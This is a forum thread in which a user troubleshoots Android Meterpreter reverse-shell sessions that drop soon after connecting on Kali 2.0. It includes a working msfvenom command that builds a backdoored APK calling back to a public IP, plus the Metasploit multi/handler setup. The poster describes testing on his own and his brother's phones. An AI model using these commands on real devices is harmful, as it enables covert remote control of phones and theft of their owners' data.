Forum Thread: Problems with MSFVenom on Kali 2.0

I seem to be having problems not with creating the payload but with getting the information from the handler after it connects. I've read different responses on what IP address to use, so I've tried them all when creating the payload. I've used my router's public and private IP, my wlan IP and my computer's, with port 8080, and also tried 443. I seem to be able to get a response on the handler when using my public IP, i.e. 66.yada.yada.yada, vs using my wlan 172.yada.yada, so I'm assuming the public IP is the way to go. Using the others I get no response from the handler.

After the payload is opened, it shows as opened on the handler, along with the date and time, then closes after connecting to a host, which I've read is fine as well. After the handler connects, it runs and then stops. Below is a copy-paste of my setup.

This is the payload setup in the terminal:

msfvenom -p android/meterpreter/reverse_tcp LHOST=66.yada.yada.yada LPORT=8080 R > App.apk

This is the multi handler setup in metasploit:

msf> use exploit/multi/handler
msf> set payload android/meterpreter/reverse_tcp
msf> set lhost 66.yada.yada
msf> set lport 8080
msf> set ExitOnSession false
msf> exploit -j

20 Responses

Is this for a LAN or WAN attack?
Also, could you post a screenshot of the metasploit console after you activate the payload on the victim device?

It's a WAN. I've tested the thing on my cell numerous times, multiple different ways, my cell being disconnected from my home network at the time. I'll take some screenshots, give me 5 min.

Trying to upload screenshots; never used this site. Clicked on attach and there's no option under "upload new image".

Upload your screenshot on imgur first, then use 'upload image from web' field.

Instead would you be able to upload the text from the terminal?

Here are all the images taken from the terminal.

The last one just keeps running non-stop; I get about 200 open and closed sessions. They are in order from start to finish. I don't seem to have a payload problem; it seems to be in the multi/handler.

Thanks for any help in advance

I will try to recreate the problem and see if I can find a way to fix this troublesome problem, I will get back to you.

With the second picture, when the first Meterpreter session died, did it die straight away or did it take a while? Also, since the multi handler was still running, you couldn't start another one; you will have to kill it first with job -k (id). Then try to start the handler again.

It died after maybe 10-15 seconds

This message reminds me of something I've already seen in the comments of two posts, here and here. Just hit ctrl+f and look for 'second' to get there quick, but I advise you to read all anyway.

I can't reproduce as I'm on Kali 1, but TL;DR Lollipop and Samsung are harder to keep the connection alive.

What phone and Android version are you testing?

Mine's a Samsung, rooted, with a custom Liquid Smooth ROM 4.4.4, and his is a stock ROM with 4.4.2, Sharp 306SH Aquos. I've heard Kali 1 is a better system than 2. Any thoughts? Have you used 2?

Never tried kali 2, but from all comments from the people I would not want to try it. Seems a lot of things have bugs or weird behaviour, plus I don't like the interface. I know I know, I could install a new desktop manager and fix the bugs myself. Truth is, I'm too lazy to do that and besides, Kali 1 does its jobs perfectly.

Not saying your problem is related to kali 2, but I might suggest you try getting that if you're not making progress.

Do you have a link for Kali 1? Seems everything brings up version 2.

Sure, there's people opening posts at least once a week about that... look here.

Thanks. Never got Armitage to work right either; every time I ran a scan of my network's IP range, none of my other computers showed up, and after doing this in metasploit my phone seemed to have shown up in Armitage with its IP. To me it seems Armitage is not really useful for scanning a LAN without having the other PCs' public IP.

Armitage is a bit buggy, but sometimes you can make things a bit faster.
But if I am doing something new or something that shouldn't fail, I always work with the metasploit console ;)


Does your android have an AntiVirus or a Power Saver app?

No. I've also tried it on 2 different devices, mine and my brother's; I only tried his due to mine being rooted and thought that was possibly the problem.